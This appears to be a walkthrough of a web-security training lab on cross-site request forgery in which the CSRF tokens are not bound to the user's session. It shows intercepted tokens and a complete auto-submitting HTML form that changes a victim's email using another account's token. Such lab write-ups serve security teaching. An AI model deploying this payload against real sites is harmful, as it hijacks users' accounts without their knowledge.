This lab's email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren't integrated into the site's session handling system.

To solve the lab, use your exploit server to host an HTML page that uses a [CSRF attack](https://portswigger.net/web-security/csrf) to change the viewer's email address.

You have two accounts on the application that you can use to help design your attack. The credentials are as follows:

-   `wiener:peter`
-   `carlos:montoya`

# Practical
So this time, we have two users account, let's open one account in Burp's browser so we have two different sessions.

Now let's both request to change email.
```txt
csrf=ZWn7eOD3homt8z1W9M8z3PRa516dCAoz for carlos
csrf=bXANhEUTnHXFHZSj1teDCZqtjGFRCfDq for wiener
```
We can see that both of the account have two different CSRF tokens. The lab says that the token are not tied to the users session so we can probably use carlos's token to change wiener's email.

Okay so drop the request that we intercepted to prevent the token being used.
Now let's craft our payload.
```html
<html>
  <body>
    <form action="https://target-aca91ff11e34641f80971073008000c1.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
      <input type="hidden" name="csrf" value="ZWn7eOD3homt8z1W9M8z3PRa516dCAoz"/>
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
**Since we're want to change wiener's email, use carlos's CSRF token. Otherwise it wouldn't be a CSRF.**

And now deliver the exploit.

And we solved the lab and changed wiener's email.
